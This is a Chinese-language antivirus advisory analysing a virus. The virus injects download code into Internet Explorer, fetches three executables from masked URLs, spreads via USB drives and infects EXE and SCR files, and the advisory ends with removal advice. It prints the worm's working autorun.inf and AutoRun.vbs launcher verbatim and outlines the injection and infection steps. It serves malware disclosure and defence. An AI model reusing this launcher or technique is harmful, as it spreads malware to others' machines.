病毒利用FindWindow查找当前进程中是否有IEXPLORE存在,如没有该进程,则使用ShellExecute启动一个IE.并使用OpenProcess打开该进程,利用VirtualAllocEx在内在中申请一块空间,把一段代码写进去,并利用CreteRemoteThread运行写入的代码.
写入的代码内容是:
从http://******.cn/m1.exe;
http://******testkl.cn/m2.exe;
http://*****.cn/m3.exe"这些网址上下载病毒.
并分别保存在"c:\\Program Files\\Common Files\\m1.exe";"c:\\Program Files
\\Common Files\\m2.exe";"c:\\Program Files\\Common Files\\m3.exe"这三个位置,然后运行.
(由于以上三个网址的连接已经失效,所以我们无法得知这三个病毒的具体作用是什么,但是只要病毒作者稍加修改地址,就可以重新生效).
病毒还会起两个线程.
其中线程1的作用就是入可移动存储设备里写入病毒本身和autorun.inf,autorun.vbs.
该线程5分钟循环执行一次.
其中autorun.inf的内容为:
[AutoRun]
open=WScript.exe AutoRun.vbs
shellexecute=WScript.exe AutoRun.vbs
shell\Auto\command=WScript.exe AutoRun.vbs
autourn.vbs的内容为:
Dim WshShell
Set WshShell = Wscript.CreateObject("Wscript.Shell")
return=WshShell.Run("AutoRun.exe",2,false)
return=WshShell.Run("\",3,false)
线程2的作用是感染"EXE"和"SCR"类型的文件.
病毒会遍历本地硬盘所有类型为 "EXE"和"SCR"的文件,找到一个文件后,病毒先判断此文件是否为PE文件.如果是,则遍历文件所有的节信息,查找是否会有名为".LWY"的节名,如果有,则是已经感染的文件,跳过该文件继续查找.如果没有,病毒在文件添加一个".LWY"的节,并在里面写入一段已写好的病毒代码,修改程序入口点,感染该文件.
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
1 . 瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到19.38.62版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。